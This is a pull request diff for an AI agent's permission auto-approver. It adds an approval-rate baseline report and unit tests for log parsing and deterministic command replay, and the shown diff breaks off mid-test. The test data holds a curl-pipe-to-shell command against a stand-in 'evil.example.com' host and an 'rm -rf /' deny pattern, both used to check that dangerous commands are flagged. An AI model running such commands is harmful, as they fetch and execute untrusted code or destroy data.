### PR TITLE
Phase 1: approval-rate report on the corpus-replay harness

### DIFF
--- a/.context/approval-rate-baseline-2026-08.md
+++ b/.context/approval-rate-baseline-2026-08.md
@@ -1,0 +1,121 @@
+# Approval-rate baseline (Phase 1, epic #1057 / #992)
+
+Baseline numbers for how much of a real `PermissionRequest` corpus the
+deterministic layers (`allow`/`deny`/`approve_groups`/`deny_groups`, #1024's
+`evaluateDeterministic`) already decide with no LLM call, what shape the
+misses have, and how the live LLM path itself behaves. Produced by
+`packages/daemon/tests/auto-approve/run-approval-rate-report.ts` over
+`packages/daemon/tests/auto-approve/approval-rate.ts`.
+
+**Status: skeleton only.** The commands below are verified to run; the
+"Numbers" section is NOT filled in -- every value there is a placeholder
+(`TBD`) until someone runs the report against a real corpus and a real
+`remi.log` and transcribes the actual output. Do not fill in a number that
+was not read off a real run (repo rule, AGENTS.md "Verify before you
+describe").
+
+## Prerequisites
+
+A real corpus is gitignored and never committed
+(`packages/daemon/tests/auto-approve/fixtures/.local-command-corpus.jsonl`).
+Generate one from a machine that has been running remi with
+`REMI_HOOK_DEBUG=1` (so `~/.remi/hook-diag.jsonl` has real captures):
+
+```bash
+bun run packages/daemon/tests/hooks/fixtures/build-hook-corpus.ts \
+  --mode structure-preserving [--input ~/.remi/hook-diag.jsonl]
+```
+
+This writes
+`packages/daemon/tests/auto-approve/fixtures/.local-command-corpus.jsonl`,
+the report's default `--input`.
+
+## Commands
+
+Coverage report against the default corpus, at the shipped default level
+(reads `~/.remi/config.toml`, or built-in defaults if absent):
+
+```bash
+bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts
+```
+
+Sweep all three strictness presets against the same corpus, ignoring
+whatever `approve_groups` the config file happens to have:
+
+```bash
+for level in strict balanced trusted; do
+  echo "=== $level ==="
+  bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts --level "$level"
+done
+```
+
+Dedupe repeated `Bash` commands before replay (closer to "distinct
+operations seen" than "raw hook-event volume"):
+
+```bash
+bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts --level trusted --unique
+```
+
+Add the live decision-log section (verdict/band/decided_by rates, latency
+p50/p95, queue-timeout and risk-ceiling counts) from a real `remi.log`:
+
+```bash
+bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts \
+  --level trusted --log ~/.remi/remi.log
+```
+
+Machine-readable output (same computed data as the tables, one JSON object):
+
+```bash
+bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts --level trusted --json | jq .
+```
+
+## Numbers
+
+Corpus captured: TBD (date, machine, record count)
+Config / level used for the headline numbers below: TBD
+
+### (a) Deterministic coverage
+
+| Level | Total records | Approve | Deny-covered | Residual | Coverage % |
+|---|---|---|---|---|---|
+| strict | TBD | TBD | TBD | TBD | TBD |
+| balanced | TBD | TBD | TBD | TBD | TBD |
+| trusted | TBD | TBD | TBD | TBD | TBD |
+
+Per-tool breakdown (trusted): TBD
+
+### (b) Miss classification (residual Bash commands, by shape)
+
+| Bucket | Count | low | moderate | high | critical |
+|---|---|---|---|---|---|
+| heredoc | TBD | TBD | TBD | TBD | TBD |
+| redirection | TBD | TBD | TBD | TBD | TBD |
+| pipeline | TBD | TBD | TBD | TBD | TBD |
+| chained | TBD | TBD | TBD | TBD | TBD |
+| single | TBD | TBD | TBD | TBD | TBD |
+
+### (c) Band distribution of the LLM-bound residue
+
+| Band | Count | % |
+|---|---|---|
+| low | TBD | TBD |
+| moderate | TBD | TBD |
+| high | TBD | TBD |
+| critical | TBD | TBD |
+
+### (d) Live decision log
+
+remi.log captured: TBD (date range, machine)
+
+- Lines / unparsed / fast-path / llm-path: TBD
+- Queue-timeout count: TBD
+- Risk-ceiling count: TBD
+- Verdict rates (approve/deny/escalate/cancelled/error): TBD
+- Latency p50/p95 by verdict: TBD
+- Notable `verdict x band x decided_by` combinations: TBD
+
+## Open questions for Phase 2
+
+TBD -- filled in once the real numbers above suggest where the next round of
+deterministic coverage (or LLM-path tuning) should focus.

--- a/.context/approval-rate-baseline-2026-08.md
+++ b/.context/approval-rate-baseline-2026-08.md
@@ -99,13 +99,14 @@ Headline config: `~/.remi/config.toml`, `level = "trusted"`.
 
 Per-tool (trusted): Bash 2/4, Edit 1/1, Read 2/2, SendMessage 0/4,
 ToolSearch 0/1. (SendMessage/ToolSearch are session-tooling events the proxy
-population includes; they never reach the auto-approve gate in production.)
+population includes; no PermissionRequest for these has been observed.)
 
 ### (b) Miss classification (residual Bash commands, by shape)
 
 Small-N on this corpus: 2 residual Bash commands, both `redirection`, both
 `moderate`. The reference distribution for the real asked-remi population is
-#996's: redirection 50%, pipeline 25%, heredoc 13%, chained 7%, single 6%.
+#996's: redirection 50%, pipeline 25%, heredoc 13%, chained 7%, single 6%
+(percentages sum to 101 from rounding).
 
 ### (c) Band distribution of the LLM-bound residue
 
@@ -116,9 +117,17 @@ the LOG half below shows them at volume).
 ### (d) Live decision log
 
 Format note: lines WITHOUT a `[band=...]` bracket are counted `fast-path`.
-On logs predating #1040 (mba's log reaches back before it) that bucket also
-contains OLD-format post-LLM verdict lines, so mba's fast-path count is
-inflated; a `0ms` duration is the reliable deterministic marker.
+The `[band=... authority=...]` bracket itself landed with #976 (commit
+ea3cf82f, Aug 3 2026); #1040 later added only the trailing `decided_by=`
+clause onto an already-bracketed line (that legacy bracket-no-`decided_by`
+shape parses correctly as llm-path, band present). The real source of
+inflation is older still: mba's log reaches back to versions that predate
+#976 itself, where the post-LLM verdict line carried no bracket at all, so
+those lines land in `fast-path` despite being real post-LLM decisions; a
+`0ms` duration is the reliable deterministic marker. Separately, every
+post-LLM matrix line is gated on `log_decisions` (default `true`); a log
+captured from a machine with that setting off shows `llm-path 0` regardless
+of how much real LLM traffic it saw.
 
 **local** (`~/.remi/remi.log`, through 2026-08-15): 29198 lines,
 aa-non-decision 314, fast-path 157, llm-path 275, queue-timeout 0,
@@ -134,8 +143,11 @@ Notable: `escalate|high|*` = 88 vs `approve|high|*` = 0 — the high band is
 structurally unapprovable by the model (#976's unwired matrix half);
 `approve|moderate` = 87 vs `escalate|moderate` = 100 — the model escalates
 the majority of moderate-band operations despite `authority=yes` (#972).
-Overall approve rate 228/432 = 52.8%; excluding the 141 deterministic
-`approve|none` fast-path lines, the LLM layer approves 87/287 = 30.3%.
+Decided (approve + deny + escalate, excluding cancelled/error) = 427; overall
+approve rate 228/427 = 53.4%. Restricted to the banded post-LLM matrix lines
+only (llm-path = 275: 87 approves vs 188 escalates), the LLM layer approves
+87/275 = 31.6% — the 141 deterministic `approve|none` and 11 always-escalate
+`escalate|none` lines are excluded as never model-evaluated.
 
 **mba** (`~/.remi/remi.log`, spans multiple versions through 2026-08-14):
 139943 lines, aa-non-decision 4669, fast-path 3528, llm-path 525,
@@ -154,7 +166,8 @@ Notable: 498 ERROR verdicts with p50 30001ms — the engine timing out at its
 9423ms (the Air's LLM is slow enough that "approved" still means a ~10s
 hang); `escalate|high|*` = 141 vs `approve|high|*` = 0 (same ceiling wall);
 `escalate|none` = 513 (always-escalate + queue-timeout + old-format lines).
-Overall approve rate 2301/3555 decided = 64.7%.
+Decided (approve + deny + escalate, excluding cancelled/error) = 3188;
+overall approve rate 2301/3188 = 72.2%.
 
 ## Open questions for Phase 2
 

--- a/.context/approval-rate-baseline-2026-08.md
+++ b/.context/approval-rate-baseline-2026-08.md
@@ -1,18 +1,17 @@
 # Approval-rate baseline (Phase 1, epic #1057 / #992)
 
-Baseline numbers for how much of a real `PermissionRequest` corpus the
-deterministic layers (`allow`/`deny`/`approve_groups`/`deny_groups`, #1024's
-`evaluateDeterministic`) already decide with no LLM call, what shape the
-misses have, and how the live LLM path itself behaves. Produced by
+Baseline numbers for how much of a real corpus the deterministic layers
+(`allow`/`deny`/`approve_groups`/`deny_groups`, #1024's `evaluateDeterministic`)
+already decide with no LLM call, what shape the misses have, and how the live
+LLM path itself behaves. Produced by
 `packages/daemon/tests/auto-approve/run-approval-rate-report.ts` over
 `packages/daemon/tests/auto-approve/approval-rate.ts`.
 
-**Status: skeleton only.** The commands below are verified to run; the
-"Numbers" section is NOT filled in -- every value there is a placeholder
-(`TBD`) until someone runs the report against a real corpus and a real
-`remi.log` and transcribes the actual output. Do not fill in a number that
-was not read off a real run (repo rule, AGENTS.md "Verify before you
-describe").
+Every number below was read off a real run on 2026-08-15 (repo rule, AGENTS.md
+"Verify before you describe"). Two machines: the primary dev Mac ("local",
+remi 0.7.7, `level = "trusted"`) and a MacBook Air ("mba", remi 0.7.7 — its
+`remi.log` spans older versions too; until 2026-08-15 it silently ran
+`strict` because its config had no `level` key, see #1058).
 
 ## Prerequisites
 
@@ -70,52 +69,102 @@ Machine-readable output (same computed data as the tables, one JSON object):
 bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts --level trusted --json | jq .
 ```
 
+## Corpus caveat for this baseline
+
+Neither machine had a usable `PermissionRequest` corpus on 2026-08-15:
+hook-diag capture is gated on `REMI_HOOK_DEBUG=1` (hook-server.ts) and the
+local machine's only capture window (142 events, ending 2026-08-08) contains
+ZERO PermissionRequest events; mba has no `hook-diag.jsonl` at all. The
+corpus half below therefore uses `--event PreToolUse` (12 unique records — a
+PROXY population that includes calls Claude Code's own allowlist approved
+without asking remi) and is small-N; the LOG half is the load-bearing part of
+this baseline. #996's corpus numbers (1183 PermissionRequests, 12.9%
+coverage at trusted) remain the reference for the asked-remi population.
+Re-run the corpus half after a capture window with `REMI_HOOK_DEBUG=1` on a
+working session.
+
 ## Numbers
 
-Corpus captured: TBD (date, machine, record count)
-Config / level used for the headline numbers below: TBD
+Corpus captured: 2026-08-15, local machine, `--event PreToolUse --unique`,
+12 unique records (see caveat above).
+Headline config: `~/.remi/config.toml`, `level = "trusted"`.
 
-### (a) Deterministic coverage
+### (a) Deterministic coverage (PreToolUse proxy corpus, --unique)
 
 | Level | Total records | Approve | Deny-covered | Residual | Coverage % |
 |---|---|---|---|---|---|
-| strict | TBD | TBD | TBD | TBD | TBD |
-| balanced | TBD | TBD | TBD | TBD | TBD |
-| trusted | TBD | TBD | TBD | TBD | TBD |
+| strict | 12 | 4 | 0 | 8 | 33.3 |
+| balanced | 12 | 5 | 0 | 7 | 41.7 |
+| trusted | 12 | 5 | 0 | 7 | 41.7 |
 
-Per-tool breakdown (trusted): TBD
+Per-tool (trusted): Bash 2/4, Edit 1/1, Read 2/2, SendMessage 0/4,
+ToolSearch 0/1. (SendMessage/ToolSearch are session-tooling events the proxy
+population includes; they never reach the auto-approve gate in production.)
 
 ### (b) Miss classification (residual Bash commands, by shape)
 
-| Bucket | Count | low | moderate | high | critical |
-|---|---|---|---|---|---|
-| heredoc | TBD | TBD | TBD | TBD | TBD |
-| redirection | TBD | TBD | TBD | TBD | TBD |
-| pipeline | TBD | TBD | TBD | TBD | TBD |
-| chained | TBD | TBD | TBD | TBD | TBD |
-| single | TBD | TBD | TBD | TBD | TBD |
+Small-N on this corpus: 2 residual Bash commands, both `redirection`, both
+`moderate`. The reference distribution for the real asked-remi population is
+#996's: redirection 50%, pipeline 25%, heredoc 13%, chained 7%, single 6%.
 
 ### (c) Band distribution of the LLM-bound residue
 
-| Band | Count | % |
-|---|---|---|
-| low | TBD | TBD |
-| moderate | TBD | TBD |
-| high | TBD | TBD |
-| critical | TBD | TBD |
+7 residual records, all `moderate` on this corpus (the high-band shapes —
+ssh/scp, git push, package installs — did not occur in the 12-record window;
+the LOG half below shows them at volume).
 
 ### (d) Live decision log
 
-remi.log captured: TBD (date range, machine)
+Format note: lines WITHOUT a `[band=...]` bracket are counted `fast-path`.
+On logs predating #1040 (mba's log reaches back before it) that bucket also
+contains OLD-format post-LLM verdict lines, so mba's fast-path count is
+inflated; a `0ms` duration is the reliable deterministic marker.
 
-- Lines / unparsed / fast-path / llm-path: TBD
-- Queue-timeout count: TBD
-- Risk-ceiling count: TBD
-- Verdict rates (approve/deny/escalate/cancelled/error): TBD
-- Latency p50/p95 by verdict: TBD
-- Notable `verdict x band x decided_by` combinations: TBD
+**local** (`~/.remi/remi.log`, through 2026-08-15): 29198 lines,
+aa-non-decision 314, fast-path 157, llm-path 275, queue-timeout 0,
+risk-ceiling 4.
+
+| verdict | n | p50 | p95 |
+|---|---|---|---|
+| approve | 228 | 0ms | 17672ms |
+| escalate | 199 | 5258ms | 25124ms |
+| cancelled | 5 | 10778ms | 15725ms |
+
+Notable: `escalate|high|*` = 88 vs `approve|high|*` = 0 — the high band is
+structurally unapprovable by the model (#976's unwired matrix half);
+`approve|moderate` = 87 vs `escalate|moderate` = 100 — the model escalates
+the majority of moderate-band operations despite `authority=yes` (#972).
+Overall approve rate 228/432 = 52.8%; excluding the 141 deterministic
+`approve|none` fast-path lines, the LLM layer approves 87/287 = 30.3%.
+
+**mba** (`~/.remi/remi.log`, spans multiple versions through 2026-08-14):
+139943 lines, aa-non-decision 4669, fast-path 3528, llm-path 525,
+queue-timeout 15, risk-ceiling 19.
+
+| verdict | n | p50 | p95 |
+|---|---|---|---|
+| approve | 2301 | 9423ms | 41442ms |
+| deny | 9 | 24778ms | 33186ms |
+| escalate | 878 | 11595ms | 32767ms |
+| cancelled | 367 | 5684ms | 26226ms |
+| error | 498 | 30001ms | 175736ms |
+
+Notable: 498 ERROR verdicts with p50 30001ms — the engine timing out at its
+30s ceiling, an entire failure class invisible until this tally; approve p50
+9423ms (the Air's LLM is slow enough that "approved" still means a ~10s
+hang); `escalate|high|*` = 141 vs `approve|high|*` = 0 (same ceiling wall);
+`escalate|none` = 513 (always-escalate + queue-timeout + old-format lines).
+Overall approve rate 2301/3555 decided = 64.7%.
 
 ## Open questions for Phase 2
 
-TBD -- filled in once the real numbers above suggest where the next round of
-deterministic coverage (or LLM-path tuning) should focus.
+- Redirection is the top miss bucket in both #996 (50%) and this proxy corpus
+  (2/2) — Phase 2's destination-checked redirect/heredoc coverage attacks the
+  right bucket first.
+- mba's 498 engine-timeout errors and 9.4s approve p50 are a latency/
+  reliability problem no coverage phase fixes — they cap how good the LLM
+  path can ever feel on that hardware and strengthen the case for Phases 4-5
+  (deterministic widening + precedent) carrying more of the load.
+- Whether to turn `REMI_HOOK_DEBUG=1` on by default for a capture window (or
+  add a dedicated, structure-preserving-only capture flag) so the next
+  baseline has a real PermissionRequest corpus on both machines.

--- a/packages/daemon/tests/auto-approve/approval-rate.test.ts
+++ b/packages/daemon/tests/auto-approve/approval-rate.test.ts
@@ -1,0 +1,352 @@
+/**
+ * Unit tests for `approval-rate.ts` (#1057, closes #992). CI-safe: unlike
+ * `guard-chain-replay.test.ts`, nothing here reads the gitignored
+ * `fixtures/.local-command-corpus.jsonl` -- every record, config, and log
+ * line below is hand-written, so this suite runs identically on a
+ * contributor's machine and in CI regardless of whether a local corpus was
+ * ever captured.
+ *
+ * NO MOCKS (repo rule): `classifyMiss` and `parseDecisionLog` are pure
+ * functions, tested with real strings; the replay tests construct a real
+ * `AutoApproveService` (via `replayDeterministic`) and call its real,
+ * exported `evaluateDeterministic`.
+ */
+
+import { describe, expect, test } from 'bun:test';
+import * as fs from 'node:fs';
+import * as os from 'node:os';
+import * as path from 'node:path';
+import { groupsForLevel } from '../../src/auto-approve/levels.ts';
+import { formatMatrixContext } from '../../src/auto-approve/risk-bands.ts';
+import type { AutoApproveConfig } from '../../src/auto-approve/types.ts';
+import {
+  classifyMiss,
+  loadCorpusRecords,
+  parseDecisionLog,
+  replayDeterministic,
+} from './approval-rate.ts';
+import type { CorpusRecord } from './approval-rate.ts';
+
+// ---------------------------------------------------------------------------
+// classifyMiss
+// ---------------------------------------------------------------------------
+
+describe('classifyMiss', () => {
+  test('heredoc: <<EOF', () => {
+    expect(classifyMiss('cat <<EOF\nhello\nEOF')).toBe('heredoc');
+  });
+
+  test('heredoc: indented <<-EOF', () => {
+    expect(classifyMiss('cat <<-EOF\n\thello\nEOF')).toBe('heredoc');
+  });
+
+  test('precedence: heredoc-with-redirect is heredoc, not redirection', () => {
+    expect(classifyMiss("cat >> f <<'EOF'")).toBe('heredoc');
+  });
+
+  test('a quoted "<<" inside a string is not a heredoc', () => {
+    expect(classifyMiss('echo "use << for redirection"')).toBe('single');
+  });
+
+  test('a here-string (<<<) is not a heredoc', () => {
+    expect(classifyMiss('cat <<< "hello"')).toBe('single');
+  });
+
+  test('redirection: plain output redirect', () => {
+    expect(classifyMiss('echo hi > out.txt')).toBe('redirection');
+  });
+
+  test('a bare input redirect (< file) is not "redirection" (no < detector; see doc)', () => {
+    expect(classifyMiss('cat < input.txt')).toBe('single');
+  });
+
+  test('pipeline', () => {
+    expect(classifyMiss('ls | grep foo')).toBe('pipeline');
+  });
+
+  test('precedence: pipeline-inside-chain is pipeline, not chained', () => {
+    expect(classifyMiss('ls | grep foo && echo done')).toBe('pipeline');
+  });
+
+  test('chained: &&', () => {
+    expect(classifyMiss('git status && git log')).toBe('chained');
+  });
+
+  test('chained: ;', () => {
+    expect(classifyMiss('echo a; echo b')).toBe('chained');
+  });
+
+  test('single: plain command', () => {
+    expect(classifyMiss('echo hello')).toBe('single');
+  });
+});
+
+// ---------------------------------------------------------------------------
+// parseDecisionLog
+// ---------------------------------------------------------------------------
+
+describe('parseDecisionLog', () => {
+  // Built with the real `formatMatrixContext`, the same function
+  // `auto-approve-service.ts` calls, and the same template shape production
+  // uses -- a round trip through real code, not a guessed string.
+  const postLlmEscalate = `[AutoApprove sess-abc] Bash: escalate (842ms) ${formatMatrixContext('moderate', true, 'model')} - model declined, ambiguous write target`;
+  const postLlmDeny = `[AutoApprove] DENIED Bash: deny (12ms) ${formatMatrixContext('critical', false, 'deny_floor')} - matched catastrophic pattern`;
+  const riskCeiling = `[AutoApprove] Bash: escalate (301ms) ${formatMatrixContext('high', false, 'risk_ceiling')} - Risk ceiling (#976): model approved a high-risk operation`;
+  // Legacy shape (#1040 predates `decided_by`): the bracket exists but stops
+  // after `authority=`.
+  const legacyNoDecidedBy =
+    '[AutoApprove sess1] Write: approve (55ms) [band=high authority=no] - model approved: safe write within workspace';
+  const deterministicDenied = '[AutoApprove] DENIED Bash: deny-matched pattern: "rm -rf /" (0ms)';
+  const cancelled =
+    '[AutoApprove sess-c] CANCELLED Bash: Cancelled: user answered via PTY (5023ms)';
+  const errorLine = '[AutoApprove] ERROR Write: Error: fetch failed: ECONNREFUSED (150ms)';
+  const queueTimeout =
+    '[AutoApprove sess-q] Bash: escalate (241007ms) - eval queue wait exceeded 240000ms; escalating to user';
+  const garbage = 'some unrelated daemon log line about nothing decision-shaped';
+
+  test('round-trips a real formatMatrixContext post-LLM escalate line', () => {
+    const { lines } = parseDecisionLog(postLlmEscalate);
+    expect(lines).toHaveLength(1);
+    const line = lines[0];
+    expect(line?.matched).toBe(true);
+    expect(line?.tag).toBe('sess-abc');
+    expect(line?.toolName).toBe('Bash');
+    expect(line?.verdict).toBe('escalate');
+    expect(line?.durationMs).toBe(842);
+    expect(line?.band).toBe('moderate');
+    expect(line?.authorityPresent).toBe(true);
+    expect(line?.decidedBy).toBe('model');
+    expect(line?.reasoning).toBe('model declined, ambiguous write target');
+    expect(line?.fastPath).toBe(false);
+  });
+
+  test('parses a post-LLM DENIED line (deny verdict, decided_by=deny_floor)', () => {
+    const { lines } = parseDecisionLog(postLlmDeny);
+    const line = lines[0];
+    expect(line?.verdict).toBe('deny');
+    expect(line?.band).toBe('critical');
+    expect(line?.decidedBy).toBe('deny_floor');
+    expect(line?.fastPath).toBe(false);
+  });
+
+  test('parses a legacy bracket with no decided_by as optional', () => {
+    const { lines } = parseDecisionLog(legacyNoDecidedBy);
+    const line = lines[0];
+    expect(line?.matched).toBe(true);
+    expect(line?.verdict).toBe('approve');
+    expect(line?.band).toBe('high');
+    expect(line?.authorityPresent).toBe(false);
+    expect(line?.decidedBy).toBeUndefined();
+    expect(line?.fastPath).toBe(false);
+  });
+
+  test('parses the fast-path deterministic DENIED (0ms) line', () => {
+    const { lines } = parseDecisionLog(deterministicDenied);
+    const line = lines[0];
+    expect(line?.matched).toBe(true);
+    expect(line?.verdict).toBe('deny');
+    expect(line?.durationMs).toBe(0);
+    expect(line?.band).toBeUndefined();
+    expect(line?.reasoning).toBe('deny-matched pattern: "rm -rf /"');
+    expect(line?.fastPath).toBe(true);
+  });
+
+  test('parses a queue-timeout escalate and flags queueTimeout', () => {
+    const { lines } = parseDecisionLog(queueTimeout);
+    const line = lines[0];
+    expect(line?.verdict).toBe('escalate');
+    expect(line?.fastPath).toBe(true);
+    expect(line?.queueTimeout).toBe(true);
+  });
+
+  test('an unrecognized line is unparsed, never thrown on', () => {
+    const { lines, tally } = parseDecisionLog(garbage);
+    expect(lines[0]?.matched).toBe(false);
+    expect(tally.unparsed).toBe(1);
+  });
+
+  test('tallies a mixed log across all known shapes', () => {
+    const text = [
+      postLlmEscalate,
+      postLlmDeny,
+      legacyNoDecidedBy,
+      deterministicDenied,
+      cancelled,
+      errorLine,
+      queueTimeout,
+      riskCeiling,
+      garbage,
+    ].join('\n');
+
+    const { tally } = parseDecisionLog(text);
+
+    expect(tally.totalLines).toBe(9);
+    expect(tally.unparsed).toBe(1);
+    expect(tally.byVerdict).toEqual({
+      approve: 1,
+      deny: 2,
+      escalate: 3,
+      cancelled: 1,
+      error: 1,
+    });
+    // fast-path: deterministicDenied, cancelled, errorLine, queueTimeout.
+    expect(tally.fastPathCount).toBe(4);
+    // LLM-path (bracket present): postLlmEscalate, postLlmDeny,
+    // legacyNoDecidedBy, riskCeiling.
+    expect(tally.llmPathCount).toBe(4);
+    expect(tally.queueTimeoutCount).toBe(1);
+    expect(tally.riskCeilingCount).toBe(1);
+    expect(tally.latenciesByVerdict.escalate).toEqual([842, 241007, 301]);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// loadCorpusRecords
+// ---------------------------------------------------------------------------
+
+describe('loadCorpusRecords', () => {
+  test('keeps only well-shaped PermissionRequest records, skips the rest', () => {
+    const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'approval-rate-loader-'));
+    const file = path.join(dir, 'corpus.jsonl');
+    const lines = [
+      JSON.stringify({
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Bash',
+        tool_input: { command: 'git status' },
+        agent_type: 'Explore',
+      }),
+      // Wrong event -- dropped.
+      JSON.stringify({ hook_event_name: 'PostToolUse', tool_name: 'Bash', tool_input: {} }),
+      // Missing tool_input -- dropped.
+      JSON.stringify({ hook_event_name: 'PermissionRequest', tool_name: 'Bash' }),
+      // Malformed JSON -- dropped, not thrown on.
+      '{not json',
+      // Blank line -- skipped.
+      '',
+      JSON.stringify({
+        hook_event_name: 'PermissionRequest',
+        tool_name: 'Read',
+        tool_input: { file_path: '/tmp/x' },
+      }),
+    ];
+    fs.writeFileSync(file, lines.join('\n'));
+
+    try {
+      const records = loadCorpusRecords(file);
+      expect(records).toHaveLength(2);
+      expect(records[0]?.toolName).toBe('Bash');
+      expect(records[0]?.agentType).toBe('Explore');
+      expect(records[1]?.toolName).toBe('Read');
+      expect(records[1]?.agentType).toBeUndefined();
+    } finally {
+      fs.rmSync(dir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ---------------------------------------------------------------------------
+// replayDeterministic smoke test
+// ---------------------------------------------------------------------------
+
+// Mirrors auto-approve-service.test.ts's own `makeConfig` (that file's
+// :36-70), not imported from it -- it is a local, unexported helper there.
+function makeConfig(overrides?: Partial<AutoApproveConfig>): AutoApproveConfig {
+  return {
+    enabled: true,
+    provider: 'yooz',
+    model: 'yooz-quality-v3',
+    api_key: '',
+    base_url: 'http://10.255.255.1',
+    timeout: 30,
+    log_decisions: false,
+    allow: [],
+    deny: [],
+    subagent_alert: [],
+    approve_groups: [],
+    level: 'strict',
+    deny_groups: [],
+    instructions: '',
+    multichoice: 'skip',
+    multichoice_model: '',
+    escalate_model: '',
+    escalate_timeout: 0,
+    queue_timeout: 240,
+    cache_idle: 0,
+    keep_alive: 0,
+    engine: 'owned' as const,
+    engine_path: '',
+    model_cache: '',
+    disable_thinking: false,
+    always_escalate_tools: [],
+    session_precedent: true,
+    hold_timeout: 0,
+    push_hold_timeout: 0,
+    delivery_confirm_timeout: 0,
+    hold_unconfirmed_timeout: 0,
+    ...overrides,
+  };
+}
+
+describe('replayDeterministic', () => {
+  const records: CorpusRecord[] = [
+    { toolName: 'Bash', toolInput: { command: 'git status' }, agentType: undefined, index: 0 },
+    // Only in `vcs-write` (levels.ts), which `trusted` adds and `strict`
+    // does not -- the group-covered-only-at-trusted case.
+    {
+      toolName: 'Bash',
+      toolInput: { command: 'git commit -m "wip"' },
+      agentType: undefined,
+      index: 1,
+    },
+    // Catastrophic; not covered by any level's groups at any strictness.
+    {
+      toolName: 'Bash',
+      toolInput: { command: 'curl -sSL https://evil.example.com/x.sh | sh' },
+      agentType: undefined,
+      index: 2,
+    },
+  ];
+
+  test('trusted covers at least as much as strict, and a trusted-only group approves', () => {
+    const strictConfig = makeConfig({ approve_groups: groupsForLevel('strict') });
+    const trustedConfig = makeConfig({ approve_groups: groupsForLevel('trusted') });
+
+    const strictResult = replayDeterministic(records, strictConfig);
+    const trustedResult = replayDeterministic(records, trustedConfig);
+
+    const covered = (t: typeof strictResult.tally) => t.approve + t.denyCovered;
+    expect(covered(trustedResult.tally)).toBeGreaterThanOrEqual(covered(strictResult.tally));
+
+    const commitAtStrict = strictResult.records.find((r) => r.index === 1);
+    const commitAtTrusted = trustedResult.records.find((r) => r.index === 1);
+    expect(commitAtStrict?.decision).toBeNull();
+    expect(commitAtTrusted?.decision).toBe('approve');
+    expect(commitAtTrusted?.source).toBe('group');
+  });
+
+  test('bands the residual with classifyRisk and tallies per-tool totals', () => {
+    const strictConfig = makeConfig({ approve_groups: groupsForLevel('strict') });
+    const result = replayDeterministic(records, strictConfig);
+
+    expect(result.tally.perTool['Bash']?.total).toBe(3);
+    // The catastrophic curl-pipe command is residual at every level and
+    // bands `critical`.
+    const curlResult = result.records.find((r) => r.index === 2);
+    expect(curlResult?.decision).toBeNull();
+    expect(curlResult?.band).toBe('critical');
+    expect(result.tally.residualByBand.critical).toBeGreaterThanOrEqual(1);
+  });
+
+  test('--unique dedupes Bash records by exact command before replay', () => {
+    const dupeRecords: CorpusRecord[] = [
+      { toolName: 'Bash', toolInput: { command: 'git status' }, agentType: undefined, index: 0 },
+      { toolName: 'Bash', toolInput: { command: 'git status' }, agentType: undefined, index: 1 },
+      { toolName: 'Read', toolInput: { file_path: '/tmp/x' }, agentType: undefined, index: 2 },
+    ];
+    const config = makeConfig({ approve_groups: groupsForLevel('strict') });
+    const deduped = replayDeterministic(dupeRecords, config, { unique: true });
+    expect(deduped.tally.total).toBe(2);
+    const notDeduped = replayDeterministic(dupeRecords, config);
+    expect(notDeduped.tally.total).toBe(3);
+  });
+});

--- a/packages/daemon/tests/auto-approve/approval-rate.test.ts
+++ b/packages/daemon/tests/auto-approve/approval-rate.test.ts
@@ -23,6 +23,7 @@ import {
   classifyMiss,
   loadCorpusRecords,
   parseDecisionLog,
+  percentile,
   replayDeterministic,
 } from './approval-rate.ts';
 import type { CorpusRecord } from './approval-rate.ts';
@@ -78,6 +79,35 @@ describe('classifyMiss', () => {
 
   test('single: plain command', () => {
     expect(classifyMiss('echo hello')).toBe('single');
+  });
+
+  test('redirection: stderr discard (2>/dev/null)', () => {
+    expect(classifyMiss('cmd 2>/dev/null')).toBe('redirection');
+  });
+
+  test('redirection: fd duplication (>&2)', () => {
+    expect(classifyMiss('cmd >&2')).toBe('redirection');
+  });
+
+  // Precedence beats pipeline, and deliberately so: `2>&1 | tee f` is a
+  // ubiquitous stderr-merge idiom, and REDIRECT_CLAUSE_RE matches the `2>&1`
+  // before the pipeline check ever runs -- draining this shape out of the
+  // pipeline bucket and into redirection, per classifyMiss's own documented
+  // precedence order (heredoc > redirection > pipeline > chained > single).
+  test('precedence: stderr-merge-then-pipe is redirection, not pipeline', () => {
+    expect(classifyMiss('cmd 2>&1 | tee f')).toBe('redirection');
+  });
+
+  test('chained: multiline command (newline joiner)', () => {
+    expect(classifyMiss('echo a\necho b')).toBe('chained');
+  });
+
+  test('redirection: process substitution (tee >(wc -l))', () => {
+    expect(classifyMiss('tee >(wc -l)')).toBe('redirection');
+  });
+
+  test('single: empty string', () => {
+    expect(classifyMiss('')).toBe('single');
   });
 });
 
@@ -208,6 +238,50 @@ describe('parseDecisionLog', () => {
     expect(tally.riskCeilingCount).toBe(1);
     expect(tally.latenciesByVerdict.escalate).toEqual([842, 241007, 301]);
   });
+
+  // The RISK CEILING sideband line (auto-approve-service.ts:1165) is emitted
+  // UNCONDITIONALLY, alongside -- never instead of -- the final :1295 matrix
+  // line that carries the actual decision. Pins that the pair counts as ONE
+  // escalate, not two, and that the sideband itself lands in
+  // autoApproveNonDecision rather than being silently dropped or double-
+  // counted as a second verdict.
+  test('risk-ceiling sideband + final line: one escalate, sideband is non-decision', () => {
+    const sideband =
+      '[AutoApprove sess-x] RISK CEILING Bash: approve -> escalate (band=high) (301ms)';
+    const text = [sideband, riskCeiling].join('\n');
+
+    const { tally } = parseDecisionLog(text);
+
+    expect(tally.byVerdict.escalate).toBe(1);
+    expect(tally.autoApproveNonDecision).toBe(1);
+  });
+
+  // Round-trips the two most common real shapes in a live log (baseline
+  // 2026-08-15: the deterministic approve and PRECEDENT approve templates
+  // together account for the bulk of fast-path approves).
+  test('round-trips the deterministic-approve template (:830)', () => {
+    const line = '[AutoApprove sess1] Bash: approve (0ms) - allow-matched pattern: "git status"';
+    const { lines } = parseDecisionLog(line);
+    const parsed = lines[0];
+    expect(parsed?.matched).toBe(true);
+    expect(parsed?.verdict).toBe('approve');
+    expect(parsed?.durationMs).toBe(0);
+    expect(parsed?.band).toBeUndefined();
+    expect(parsed?.fastPath).toBe(true);
+  });
+
